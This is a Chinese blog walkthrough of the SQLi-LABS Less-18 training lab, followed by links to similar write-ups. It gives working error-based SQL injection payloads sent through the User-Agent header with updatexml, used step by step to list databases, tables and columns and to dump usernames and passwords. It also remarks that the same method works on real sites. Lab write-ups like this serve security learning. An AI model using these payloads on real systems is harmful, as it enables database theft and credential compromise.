SQLi LABS Less-18

最新推荐文章于 2024-06-01 17:56:01 发布
最新推荐文章于 2024-06-01 17:56:01 发布
阅读量1.5w 收藏 5
点赞数 3
分类专栏: SQLi-LABS 靶场通关教程 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118115291
版权

第十八关请求方式为 GET请求 , 注入点为 User-Agent , 注入方式为 错误注入

 

第一步,判断注入方式

 先看源码

 后台代码对 特殊字符进行了过滤 , 常规的注入方式行不通 , 只有通过代码审计来判断注入方式

 

 登录成功后 , 有一个保存用户主机信息的SQL语句 , 并且没有对参数进行过滤 , 我们可以针对这个SQL进行错误注入

真实场景中 , 我们可以先注册一个账号进行登录 , 登录成功后通过User-Agent 进行错误注入 , 从而实现脱库

使用 Burp 工具进行代理拦截 , 修改 User-Agent

User-Agent: ' and updatexml(1,'~',3) and '

updatexml() 的第2个参数如果包含特殊符号就会报错 , 利用其报错信息可获取数据库信息

 

页面返回了我们插入的报错信息 , 固 存在错误注入

 

第二步,获取所有数据库

 查询information_schema默认数据库的schemata表的schema_name字段 , 该字段保存了所有数据库名

User-Agent: ' and updatexml(1,concat('~',
substr(
(select group_concat(schema_name) 
from information_schema.schemata),50,31)
),3) and '

 concat() , 可将结果拼接指定字符 , 目的在于触发错误

group_concat() , 可将多行结果合并为一行 , 目的在于方便展示

sunstr() , 用来截取字符串 , updatexml()返回结果的字符串长度限制为32 , 需要多次截取来获取完整结果

注意: User-Agent 的参数中 不要包含空格

下一步 , 根据security数据库 获取其所有表

 

第三步,获取所有表

查询information_schema默认数据库的tables表的table_name字段 , 该字段保存了所有表名

User-Agent: ' and updatexml(1,concat('~',
substr(
(select group_concat(table_name) 
from information_schema.tables 
where table_schema='security')
,1,31)
),3) and '

注意 : User-Agent 参数中 不要有空格

users表为用户表 , 下一步根据users表 获取其所有字段

 

第四步,获取所有字段

查询information_schema默认数据库的columns表的column_name字段 , 该字段保存了所有字段名

User-Agent: ' and updatexml(1,concat('~',
substr(
(select group_concat(column_name) 
from information_schema.columns 
where table_schema='security' and table_name='users')
,1,31))
,3) and '

注意 : User-Agent 参数中不要有空格

 

第五步,获取账号密码

User-Agent: ' and updatexml(1,concat('~',
substr(
(select group_concat(username,'~',password)
from security.users)
,1,31))
,3) and '

 

 

 

 

士别三日wyx
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sqli-labs靶场题解(less 1-18
ph0ebus的博客
03-07 386
入门sql注入
sqli-labs第十八关详解
金 帛的博客
05-03 4558
SQL注入靶场第十八关详解
Less-18 【User-Agent】
tubug的博客
05-20 273
因为它报错回显的字符数量有限,所以我们需要更改1,32的1,以第1位开始往后32位的字符(其中包括第1位)切换到浏览器我们输入账号密码然后点击Submit,然后我们打开BP就会发现已经抓取的HTTP请求包。User-Agent只是一个特殊的字符串,所以我们去判断字段数,因为没有信息,所以提供报错。我们按以下Ctrl+R键,然后点击Repeater查看我们传送过来的请求包。我们先试一下User-Agent,在它的最后加一个单引号看看。这时候我们就可以使用异常报错的方式来获取我们想要的信息。
Sqli-labs之Less-18和Less-19
m0_46315342的博客
06-04 660
                                          &nbs...
sqli-labs关卡18(基于http头部报错盲注)通关思路
zyh1588的博客
11-18 1806
小白回顾sql靶场第18
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
Sqlilabs-18
KAKA的博客
07-09 869
来到了 1818 关同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input 再看看后台 SQL 语句的构造: insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
sqli-lab靶场18关基于post的头部信息报错注入
qq_46527080的博客
12-18 599
知识点 $_SERVER['HTTP_USER_AGENT']。 这是用来检查浏览页面的访问者在用什么浏览器.   其中需要检查用户的 agent 字符串,它是浏览器发送的 HTTP 请求的一部分。   如:var_dump($_SERVER['HTTP_USER_AGENT']);   输出:string(65) "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Fire 通过查看源码看到,是一个insert的语句,我们通过构造updatexml
【渗透测试】sqli-labs闯关(18-24)
qq_43168364的博客
08-22 881
第十八关:user-agent单引号字符型注入点 方法:在user-agent上进行xpath报错注入 这一关我们输入用户名和密码之后给我们回显除了user-agent的信息,我们猜想注入应当是发生在user-agent上的。我们首先看看源代码。 果然这里把user-agent插入了数据库,我们只需要闭合$uagent前后的单引号然后写上注入语句即可。我们首先得到表名,语法:' and ext......
sqlilabs靶场为例,讲解SQL注入攻击原理【18-24关】
最新发布
weixin_42515203的博客
06-01 767
sqlilabs靶场为例,讲解SQL注入攻击原理【18-24关】
sqli-labs/Less-18
m0_71299382的博客
11-18 161
sqli-labs/第十八关
Sqli-labs Less18-22 HTTP 头注入 POST
kevinhanser
08-09 927
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 18: POSt - Header injection- Uagent field - Error vased 测试漏洞 源代码 $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ...
SQLI-LAB  的 实战记录(Less 11 - Less 20)
这块盾牌有待改良
07-15 4301
Less - 11 Error Based- String Less - 12 Error Based- Double quotes- String Less - 13 Double Injection- String- with twist
通过sqli-labs学习sql注入——基础挑战之less11-22
热门推荐
giantbranch的专栏
05-19 1万+
上一次就讲了基础挑战之less1-10,都是get型的,包含的种类也是比较多了,这次的是post型注入一般都是登陆绕过,当然也是可以获取数据库的信息,具体看下面的实验吧。 一些基础的知识上一篇基础挑战之less1-10会有,这里不会讲以前讲过了知识了,还有盲注的python脚步哦,有需要的链接去看看 工具 还是火狐+hackbar插件 看看要post提交的字段吧,uname和p
sqli-labs less17-20
sopora的博客
10-09 593
LESS 17 基于错误的UPDATE查询 源码中的几个php函数: get_magic_quotes_gpc() magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“ ”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误 get_magic_quotes_gpc...
Sqlilabs Less 18-20 Post - Head Injection - Error Based - String
baynk的博客
03-15 524
Sqlilabs Less-18 Header Injection- Error Based- string 手工注入 测试后没发现用户名和密码都没有注入点。。。 但是页面上一直显示IP地址,就考虑是不是x-forward字段问题,试了也没有办法。。。于是用admin登陆了下,发现登陆成功后,会显示UA。。。继续尝试 将UA改成test'后成功报错 看起来是UA字段还在IP地址和用户名前面,...
SQLi-labs(Less-18、Less-19)
weixin_41182861的博客
08-01 198
Less-18 POST - Header Injection - Uagent field - Error based POST头User-Agent注入 在页面username、password处都没有发现注入点。 查看源代码: // $uagent = $_SERVER['HTTP_USER_AGENT']; #HTTP请求头的User-Agent $IP = $_SERVER['REMOTE_ADDR']; #获取IP //对uname和passwd都做了像Less-17一样的过滤 $un
sqli-labs-less-7
09-26
在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值